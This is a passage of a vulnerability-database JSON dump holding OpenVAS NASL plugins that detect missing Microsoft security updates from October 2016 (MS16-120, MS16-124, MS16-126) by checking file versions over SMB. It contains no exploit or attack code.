checked: ' + lyncPath2 + \"\\lynchtmlconv.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + \"15.0 - 15.0.4867.0999\" + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:47:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-7182", "CVE-2016-3262"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-120.", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809445", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809445", "type": "openvas", "title": "Microsoft Lync Attendee Multiple Vulnerabilities (3192884)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Lync Attendee Multiple Vulnerabilities (3192884)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809445\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3209\", \"CVE-2016-3262\", \"CVE-2016-3263\", \"CVE-2016-3396\",\n \"CVE-2016-7182\");\n script_bugtraq_id(93385, 93390, 93394, 93380, 93395);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 12:47:25 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Lync Attendee Multiple Vulnerabilities (3192884)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-120.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The Windows Graphics Device Interface (GDI) improperly handles objects\n in memory.\n\n - The windows font library which improperly handles specially crafted\n embedded fonts.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code on the affected system and gain\n access to potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Lync Attendee 2010.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192884\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_lync_detect_win.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Lync/Attendee/Ver\", \"MS/Lync/Attendee/path\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\ninclude(\"version_func.inc\");\n\n## For Microsoft Lync 2010 Attendee (admin level install)\n## For Microsoft Lync 2010 Attendee (user level install)\n\nlyncPath = get_kb_item(\"MS/Lync/Attendee/path\");\nif(lyncPath)\n{\n dllVer = fetch_file_version(sysPath:lyncPath, file_name:\"Rtmpltfm.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.7577.4520\"))\n {\n\n report = 'File checked: ' + lyncPath + \"Rtmpltfm.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0 - 4.0.7577.4520' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:49:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-7182", "CVE-2016-3262"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310807372", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807372", "type": "openvas", "title": "Microsoft Office Word Viewer Remote Code Execution Vulnerabilities (3192884)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office Word Viewer Remote Code Execution Vulnerabilities (3192884)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807372\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3209\", \"CVE-2016-3262\", \"CVE-2016-3263\", \"CVE-2016-3396\", \"CVE-2016-7182\");\n script_bugtraq_id(93385, 93390, 93394, 93380, 93395);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 10:48:54 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Office Word Viewer Remote Code Execution Vulnerabilities (3192884)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the windows\n True Type Font and GDI+ libraries are improperly handles specially crafted\n embedded fonts.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Word Viewer.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3118394\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/Office/WordView/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\ninclude(\"version_func.inc\");\n\n\nwordviewPath = get_kb_item(\"SMB/Office/WordView/Install/Path\");\nif(!wordviewPath){\n exit(0);\n}\n\nif(wordviewPath)\n{\n wordviewVer = fetch_file_version(sysPath:wordviewPath, file_name:\"gdiplus.dll\");\n\n if(wordviewVer)\n {\n ## gdipluss.dll will update for https://support.microsoft.com/en-us/kb/3118394\n if(version_in_range(version:wordviewVer, test_version:\"11.0\", test_version2:\"11.0.8434\"))\n {\n report = 'File checked: ' + wordviewPath + \"gdiplus.dll\" + '\\n' +\n 'File version: ' + wordviewVer + '\\n' +\n 'Vulnerable range: 11.0 - 11.0.8434 \\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:57:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-7182", "CVE-2016-3262"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.", "modified": "2019-12-20T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310807371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807371", "type": "openvas", "title": "Microsoft Office Multiple Remote Code Execution Vulnerabilities (3192884)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office Multiple Remote Code Execution Vulnerabilities (3192884)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807371\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2016-3209\", \"CVE-2016-3262\", \"CVE-2016-3263\", \"CVE-2016-3396\", \"CVE-2016-7182\");\n script_bugtraq_id(93385, 93390, 93394, 93380, 93395);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 10:48:54 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Office Multiple Remote Code Execution Vulnerabilities (3192884)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the windows\n True Type Font and GDI+ libraries are improperly handles specially crafted\n embedded fonts.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Office 2007 Service Pack 3\n\n - Microsoft Office 2010 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3118301\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3118317\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\n## MS Office 2007/2010\nif(!officeVer || officeVer !~ \"^1[24]\\.\"){\n exit(0);\n}\n\nmsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(msPath)\n{\n foreach ver (make_list(\"OFFICE12\", \"OFFICE14\"))\n {\n offPath = msPath + \"\\Microsoft Shared\\\" + ver;\n msdllVer = fetch_file_version(sysPath:offPath, file_name:\"Ogl.dll\");\n\n if(msdllVer)\n {\n if(msdllVer =~ \"^12\\.\"){\n Vulnerable_range = \"12.0 - 12.0.6757.4999\";\n }\n else if(msdllVer =~ \"^14\\.\"){\n Vulnerable_range = \"14.0 - 14.0.7174.4999\";\n }\n\n if(version_in_range(version:msdllVer, test_version:\"14.0\", test_version2:\"14.0.7174.4999\") ||\n version_in_range(version:msdllVer, test_version:\"12.0\", test_version2:\"12.0.6757.4999\"))\n {\n report = 'File checked: ' + offPath + \"\\Ogl.dll\" + '\\n' +\n 'File version: ' + msdllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:47:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0075", "CVE-2016-0079", "CVE-2016-0070", "CVE-2016-0073"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-124", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809440", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809440", "type": "openvas", "title": "Microsoft Windows Registry Multiple Vulnerabilities (3193227)", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Registry Multiple Vulnerabilities (3193227)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809440\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-0070\", \"CVE-2016-0073\", \"CVE-2016-0075\", \"CVE-2016-0079\");\n script_bugtraq_id(93354, 93355, 93356, 93357);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 08:40:20 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Windows Registry Multiple Vulnerabilities (3193227)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-124\");\n\n script_tag(name:\"vuldetect\", value:\"Gets the vulnerable file version and\n checks if the appropriate patch is applied or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple elevation of privilege\n vulnerabilities exist in Microsoft Windows when a Windows kernel API\n improperly allows a user to access sensitive registry information.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to gain access to information not intended to be available to the user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3193227\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS16-124\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-124\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, winVistax64:3, win2008:3, win2008x64:3,\n win2008r2:2, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nkerPath = smb_get_system32root();\nif(!kerPath ){\n exit(0);\n}\n\nkerVer = fetch_file_version(sysPath: kerPath, file_name:\"ntoskrnl.exe\");\nedgeVer = fetch_file_version(sysPath: kerPath, file_name:\"edgehtml.dll\");\nif(!kerVer && !edgeVer){\n exit(0);\n}\n\nif (kerVer =~ \"^6\\.0\\.6002\\.1\"){\n Vulnerable_range = \"Less than 6.0.6002.19697\";\n}\nelse if (kerVer =~ \"^6\\.0\\.6002\\.2\"){\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24019\";\n}\nelse if (kerVer =~ \"^6\\.1\\.7601\"){\n Vulnerable_range = \"Less than 6.1.7601.23564\";\n}\nelse if (kerVer =~ \"^6\\.2\\.9200\"){\n Vulnerable_range = \"Less than 6.2.9200.22001\";\n}\nelse if (kerVer =~ \"^6\\.3\\.9600\\.1\"){\n Vulnerable_range = \"Less than 6.3.9600.18505\";\n}\nelse if (kerVer =~ \"^10\\.0\\.10240\"){\n Vulnerable_range = \"Less than 10.0.10240.17146\";\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008x64:3, win2008:3) > 0)\n{\n if(version_is_less(version:kerVer, test_version:\"6.0.6002.19697\")||\n version_in_range(version:kerVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24019\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n ## Presently GDR information is not available.\n if(version_is_less(version:kerVer, test_version:\"6.1.7601.23564\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n ## Presently GDR information is not available.\n if(version_is_less(version:kerVer, test_version:\"6.2.9200.22001\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:kerVer, test_version:\"6.3.9600.18505\")){\n VULN = TRUE ;\n }\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:kerVer, test_version:\"10.0.10240.17146\"))\n {\n Vulnerable_range = \"Less than 10.0.10240.17146\";\n VULN = TRUE ;\n }\n\n else if(edgeVer)\n {\n if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range2 = \"11.0.10586.0 - 11.0.10586.632\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range2 = \"11.0.14393.0 - 11.0.14393.320\";\n VULN2 = TRUE ;\n }\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + kerPath + \"\\\\ntoskrnl.exe\" + '\\n' +\n 'File version: ' + kerVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nif(VULN2)\n{\n report = 'File checked: ' + kerPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-10T19:47:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3298"], "description": "This host is missing a moderate security\n update according to Microsoft Bulletin MS16-126.", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809345", "type": "openvas", "title": "Microsoft Internet Messaging API Information Disclosure Vulnerability (3196067)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Messaging API Information Disclosure Vulnerability (3196067)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809345\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3298\");\n script_bugtraq_id(93392);\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 08:11:15 +0530 (Wed, 12 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Messaging API Information Disclosure Vulnerability (3196067)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a moderate security\n update according to Microsoft Bulletin MS16-126.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An information disclosure vulnerability exists\n when the Microsoft Internet Messaging API improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n test for the presence of files on disk.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3196067\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-126\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS16-126\");\n\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win7:2, win7x64:2, win2008:3, win2008x64:3,\n win2008r2:2, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1,\n win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nWin32Ver = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\noleVer = fetch_file_version(sysPath:sysPath, file_name:\"inetcomm.dll\");\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!Win32Ver && !oleVer && !edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && Win32Ver)\n{\n if(version_is_less(version:Win32Ver, test_version:\"6.1.7601.23545\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23545\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0 && oleVer)\n{\n if(version_is_less(version:oleVer, test_version:\"6.0.6002.19694\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19694\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:oleVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24017\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24017\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && Win32Ver)\n{\n if(version_is_less(version:Win32Ver, test_version:\"6.2.9200.21977\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.21977\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) > 0 && Win32Ver)\n{\n if(version_is_less(version:Win32Ver, test_version:\"6.3.9600.18470\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18470\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && edgeVer)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17146\"))\n {\n Vulnerable_range2 = \"Less than 11.0.10240.17146\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range2 = \"11.0.10586.0 - 11.0.10586.632\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range2 = \"11.0.14393.0 - 11.0.14393.320\";\n VULN2 = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + Win32Ver + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\inetcomm.dll\" + '\\n' +\n 'File version: ' + oleVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-10T19:49:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0142"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-122", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809063", "type": "openvas", "title": "Microsoft Video Control Remote Code Execution Vulnerability (3195360)", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Video Control Remote Code Execution Vulnerability (3195360)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# 